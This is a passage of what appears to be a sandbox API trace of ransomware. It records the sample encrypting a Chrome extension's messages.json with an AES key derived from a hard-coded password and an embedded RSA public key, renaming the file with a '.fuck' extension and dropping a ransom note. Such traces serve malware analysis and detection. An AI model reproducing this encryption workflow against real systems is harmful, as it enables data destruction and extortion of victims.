dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.354] GetFileType (hFile=0x5d64) returned 0x1 [0264.354] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.355] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.355] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0264.355] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.355] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.355] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.355] GetLastError () returned 0x0 [0264.356] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json")) returned 0x20 [0264.356] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0264.356] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.357] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.358] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.358] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.360] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.360] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.360] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.360] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0264.360] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.360] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.360] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e76188) returned 1 [0264.361] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76188, dwCertEncodingType=0x1, pInfo=0x2eaf160*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf190*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf198*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ef40) returned 1 [0264.361] CryptEncrypt (in: hKey=0x2e7ef40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.361] CryptEncrypt (in: hKey=0x2e7ef40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e766d8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e766d8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.361] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e766d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e766d8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.362] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.364] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.364] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.375] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.375] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.375] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.376] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.376] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.376] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.376] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.376] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.377] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.377] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.377] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.377] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.377] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.377] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.378] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.378] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.378] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.378] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.378] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.378] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.379] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.379] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.379] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.379] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.379] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.379] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.379] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.379] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.379] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.379] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.379] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.379] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.380] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2f1, lpOverlapped=0x0) returned 1 [0264.380] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2f1, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x300) returned 1 [0264.380] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x300, lpOverlapped=0x0) returned 1 [0264.380] CloseHandle (hObject=0x5d60) returned 1 [0264.380] CloseHandle (hObject=0x5d5c) returned 1 [0264.380] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0264.383] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0264.384] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0264.385] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0264.387] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0264.387] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0264.387] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.387] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.387] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.387] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 